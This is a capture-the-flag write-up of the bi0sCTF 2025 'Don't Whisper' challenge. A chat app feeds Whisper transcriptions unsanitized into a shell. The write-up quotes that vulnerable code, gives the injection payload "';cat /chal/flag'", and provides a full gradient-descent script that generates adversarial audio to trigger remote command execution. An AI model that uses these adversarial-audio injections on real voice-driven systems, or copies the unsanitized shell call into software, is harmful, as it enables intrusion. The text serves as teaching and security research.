Don't Whisper - bi0sCTF 2025


tl;dr

  • Whisper model converts audio to text
  • text is passed through subprocess and not sanitized
  • difficult to generate a command injection through manual voice
  • Need to invert the Neural network that will generate the audio file we need
  • Implement Gradient descent based inversion to find input for target output.
  • Generate the audio file and send, get flag!

Challenge Points: 991
No. of solves: 5
Challenge Author: w1z

Challenge Description

many say that neural networks are non deterministic and generating mappings between input and output is non TRIVIAL

Challenge Files

Detailed Writeup

We are greeted with a chat app

Chat app interface

Super smart, it is.
Chatbot response

Seems like, we can send messages and voice commands (MP3 and WAV files)

Looking at the given source for the webapp
we need to read the /chal/flag

Ignoring the very complex chatbot.py, we look at the fast api code base app.py

We see a couple of subprocess’s but the default arg for shell is False in subprocess.run() read more.
so we won’t find anything useful here, and there is a bit of sanitization as well.

But there is this as well,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
result = subprocess.run(
[
"python3", "whisper.py", "--model", "tiny.en", audio_file_path,
"--language", "English", "--best_of", "5", "--beam_size", "None"
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)

# Check for errors
if result.returncode != 0:
return JSONResponse(content={"error": "Error processing audio file."}, status_code=500)

transcription = result.stdout.strip()
if not transcription:
return JSONResponse(content={"error": "No transcription generated."}, status_code=400)

print("Transcription",transcription)
chatbot_proc = await asyncio.create_subprocess_shell(
f"python3 chatbot.py '{transcription}'",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.STDOUT
)
chatbot_stdout, chatbot_stderr = await chatbot_proc.communicate()

So the output of whisper (The transcription from Audio to Text) is sent through asyncio.create_subprocess_shell which is vulnerable to command injection attacks
and the transcription is not sanitized as well.

All good!

So we need to send an audio file which will translate to something like ';cat /chal/flag
You’d be crazy to try this by manually creating audio files

I’ve done this myself, turns out you get pretty ahead by saying,
There's <silence for 5 sec> cat flag

This would sometimes transcribe as
There's \n cat flag

The new line would work as a good proxy for ;
but good luck on trying to get it to generate /chal/flag, i was half expecting some madlad to do it (do reach out if you did tho, props!)

Ive thought of making it impossible to do it manually (by human voice) by storing the flag as
r3l1y_-0--c0mplx-txt/f41g.txt-y0u-g3t-th3-id3a.txt/0r-m3ybe-not.txt

which would be near impossible manually as whisper can generate all kinds of symbols but when you speak them out they write out the word “Single Quote, semi colon, Cats forward slash chal, forward slash Flag.”

From my previous RE experience this seemed like an RE challenge to me
you have a function (the NN) and you have a target output, you need to see if you can invert the function and figure out which input would generate that, since the whole function is a white box and we have the model weights locally, unless the function is hard to invert like a hashing function this should be possible.

This type of attacks have been done before and are called as Model Inversion attacks

Looking at the source code for whisper
and following how its converting the audio to text.

we eventually get to the main loop for the transcription in decoding.py
(I did make a few changes to the source code when compared to the open source version, removed Beam Search Decoding and made decoding simple,and this will affect the models output)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
def _main_loop(self,mel):

tokenizer: Tokenizer = self.tokenizer
n_audio = 1
torch.cuda.empty_cache()
self.decoder.reset()
audio_features: Tensor = checkpoint.checkpoint(self._get_audio_features,mel)

# Initialize tokens for decoding (repeated for each sample in the batch)
tokens: Tensor = torch.tensor([self.initial_tokens],device=self.model.device).repeat(n_audio, 1)
sum_logprobs = torch.zeros(tokens.shape[0], device=self.model.device)

max_len = 12 # max number of tokens allowed

for i in range(max_len):
if audio_features.shape[1] == 0:
raise ValueError("Tokens or audio_features have zero-length dimensions!")

logits = self.inference.logits(tokens, audio_features)
logits = logits[:, -1] # focus on the last token's logits

# Use argmax for token selection (for inference and next step)
next_tokens = logits.argmax(dim=-1, keepdim=True)
tokens = torch.cat([tokens, next_tokens], dim=-1)

if next_tokens == self.decoder.eot:
break

tokens = tokens[0].tolist()
return tokens

One good thing about this challenge is that, you can just add a few lines to this source code and solve it
Since the approach is a gradient descent where you need to do inference couple of times and back-propagate, tweak your randomly generate audio file, optimize in such a way that your output is more close to your target output.

Modifying _main_loop for Model Inversion

To make this challenge super easy to solve, you can modify the _main_loop function in decoding.py to perform gradient descent directly. The idea is to take a random mel spectrogram, run it through the model, compare the output tokens to our target (';cat /chal/flag'), and tweak the input to minimize the difference using backpropagation.

What we changed:

  • Made mel a learnable parameter with requires_grad_(True).
  • Added an optimizer (Adam) and loss function (CrossEntropyLoss).
  • Added a target text (';cat /chal/flag') and converted it to tokens.
  • Wrapped the token prediction in a loop (50 iterations) to optimize mel by comparing predicted logits to target tokens.
  • Clamped mel to [-1, 1] to keep it valid.
  • After optimization, ran the original transcription loop to verify the output.
  • Returned both the tokens and the optimized mel spectrogram.

You can then convert the optimized mel to audio using torchaudio.transforms.InverseMelScale and save it as adversarial.wav. Run whisper.py with this modified code, and it’ll generate the audio file that transcribes to ';cat /chal/flag'. Upload it to the chat app, and boom, you get the flag!

Theory: How and Why This Works

Here’s a quick rundown on what’s happening, with some math to make it clear:

  • Whisper’s Decoding Process: Audio is converted to a log-mel spectrogram $ M \in \mathbb{R}^{1 \times n_{\text{mels}} \times T} $, where $ n_{\text{mels}} = 80 $ and $ T = 3000 $ (frames for 30 seconds). The encoder transforms this into audio features:

$ F = \text{Encoder}(M) $

where $ F \in \mathbb{R}^{1 \times D \times T} $ and $ D $ is the feature dimension. The decoder then takes these features and a sequence of tokens $ T = [t_1, t_2, \dots, t_{n-1}] $ to predict the next token’s logits:

$ L_n = \text{Decoder}(T_{1:n-1}, F) $

where $ L_n \in \mathbb{R}^{V} $ (with $ V $ as the vocabulary size) is the probability distribution over possible tokens, and the next token is chosen via $ t_n = \arg\max(L_n) $. This repeats until the end-of-transcription (EOT) token or max length (12 tokens).

  • Model Inversion: We want an audio that transcribes to ';cat /chal/flag'. So, we start with a random audio (random mel spectrogram), run it through the model, and get predicted tokens. We compare these to the target tokens (from tokenizer.encode("';cat /chal/flag')) using CrossEntropyLoss. For a target token sequence $T^* = [t^*_1, t^*_2, \dots, t^*_k]$ , we optimize the mel spectrogram $ M $ to minimize:

$ \mathcal{L} = \sum_{n=1}^k \text{CrossEntropy}(L_n, t^*_n) $

where $ L_n $ is the logits for the $ n $-th token. Backpropagation (check this 3Blue1Brown video) tweaks $ M $ to reduce the loss. The clamp function ensures the audio stays within [-1, 1], though it makes the function slightly non-differentiable (but it still works fine).

  • Why Gradient Descent?: Since Whisper is a differentiable model (white-box), we can use gradient descent to optimize the input. It’s like reverse engineering a function: given the output, find the input. The Adam optimizer is great for this because it handles the complex, non-linear nature of neural networks efficiently.
  • Why This Setup?: We target one token at a time in the loop, feeding the correct target token instead of the predicted next_tokens (like in the original code). This forces the model to optimize toward the exact sequence we want. Removing the if next_tokens == self.decoder.eot: break check (as I noted earlier) can make it converge faster by avoiding early termination.

Why Not Manual Audio?

Manually crafting audio is a pain because Whisper’s tokenizer is picky about symbols. Complex paths like /chal/f41g.txt or r3l1y_-0--c0mplx-txt/f41g.txt-y0u-g3t-th3-id3a.txt/0r-m3ybe-not.txt make it even worse. The 30-second, 40MB limit also constrains what you can do manually. Model inversion automates this, letting us generate precise audio that hits the target transcription.

Full Solution Script

Standalone sol script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import torch
from whisper import load_model
from whisper.audio import log_mel_spectrogram, pad_or_trim
from whisper.tokenizer import get_tokenizer
import torchaudio
from torch import nn

DEVICE = "cuda"
target_text = "';cat /chal/flag'"
model = load_model("tiny.en")
model.eval()
tokenizer = get_tokenizer(
model.is_multilingual,
num_languages=model.num_languages,
language="en",
task="transcribe",
)
target_tokens = tokenizer.encode(target_text)
target_tokens = target_tokens + [50256] # Add EOT token

adv = torch.randn(1, 16000*20, device=DEVICE, requires_grad=True)
optimizer = torch.optim.Adam([adv], lr=0.01)
loss_fn = nn.CrossEntropyLoss()

num_iterations = 50
for i in range(num_iterations):
tokens = torch.tensor([[50257, 50362]], device=DEVICE) # [SOT, EN]
total_loss = 0
for target_token in target_tokens:
optimizer.zero_grad()
mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000*30)
mel = pad_or_trim(mel, 3000).to(model.device)
audio_features = model.embed_audio(mel)
logits = model.logits(tokens, audio_features)[:, -1]
loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
total_loss += loss
loss.backward()
optimizer.step()
adv.data = adv.data.clamp(-1, 1)
assert adv.max() <= 1 and adv.min() >= -1
tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)
print(f"Iteration {i+1}/{num_iterations}, Loss: {loss.item():.4f}")

torchaudio.save("adversarial.wav", adv.detach().cpu(), 16000)

print("Transcribing generated adversarial audio:")
result = model.transcribe(adv.detach().cpu().squeeze(0))
print(f"Transcription: {result['text']}")

Upload adversarial.wav to the chat app, and it’ll execute cat /chal/flag, giving you the flag.

Flag:

1
bi0sctf{DiD_Y0u_kn0w_NN_c4n_b3_1nv3rt3d-1729}

Musings and Future Work

Making the target text complicated like /chal/f41g.txt or r3l1y_-0--c0mplx-txt/f41g.txt-y0u-g3t-th3-id3a.txt/0r-m3ybe-not.txt makes it way harder to converge. I wonder if some outputs are impossible given the 30-second, 40MB constraint. If we remove the audio length limit, can we reliably generate audio for any arbitrary text, no matter how random? This feels like a big deal for AI traceability and safety alignment.

Like, if we can prove certain harmful outputs can’t be generated (no input exists to produce them), we can functionally explain the model’s behavior. Why do we still think LLMs are black boxes? They’re just massive, non-linear equations! Research on model inversion attacks shows we can extract inputs from outputs in white-box settings, which is exactly what we’re doing here. Other work, explores gradient-based inversion for images, which is harder but related.

What if we combine symbolic execution with LLMs? Imagine a trusted LLM that fuzzes for harmful content, checking if any input can trigger bad outputs. Papers discuss symbolic execution for neural networks, suggesting we could constrain LLMs to avoid certain behaviors. If we track functional mappings (input to output) with a constant seed, we could make LLMs more deterministic. This challenge shows neural networks aren’t that fuzzy. You can play around with them.

I got the idea for this challenge from a tweet showing Whisper generating weird subtitles for background noise. Im thinking of writing a universal library for inverting NeuralNetworks efficiently.

Also, could Z3 (that constraint solver) work here? Never tried it, but it’d be cool to see if it can invert Whisper’s token sequence.

The problem, as someone famously said, is LLMs are too fuzzy, and symbolic execution is too constrained. A combo could be the path to AGI. Constrained LLMs with traceable mappings. Can we make a function where no input produces harmful audio? That’s the dream for AI safety.

So in short, this challenge was made to show ppl AI isn’t all non-deterministic and can be played around with. We send the generated audio file, get an RCE, and cat the flag. Hope you had fun solving this challenge, do reach out for any questions! Cheers!